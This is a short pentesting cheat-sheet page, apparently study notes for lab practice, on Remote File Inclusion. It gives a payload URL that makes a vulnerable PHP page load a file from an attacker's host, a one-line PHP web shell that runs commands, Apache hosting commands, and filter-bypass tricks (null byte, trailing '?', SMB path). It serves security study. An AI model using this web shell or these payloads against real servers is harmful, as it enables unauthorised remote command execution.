RFI - Remote File Inclusion
See PG Practice SLORT for uploading a php reverse shell that executes simultaneously in windows!
https://securityxploded.com/remote-file-inclusion.php
Less common than LFI because it has to be configured to be able to call remotely, however ALWAYS CHECK IT if you found a LFI.
Test payload:
http://10.11.0.22/menu.php?file=http://10.11.0.4/evil.txt
Result would be an incoming connection on a nc listener.
Exploiting:
Host the file with malicious php code:
kali@kali:/var/www/html$ cat evil.txt
<?php echo shell_exec($_GET['cmd']); ?>
kali@kali:/var/www/html$ sudo systemctl restart apache2
Call it with the RFI payload:
http://10.11.0.22/menu.php?file=http://10.11.0.4/evil.txt&cmd=ipconfig
Tricks:
Add null byte to terminate string and bypass upload restriction of filetype - %00
Append a ? to the end of the payload to continue the string as if there isn't a payload
If http is excluded, try SMB link instead
Last updated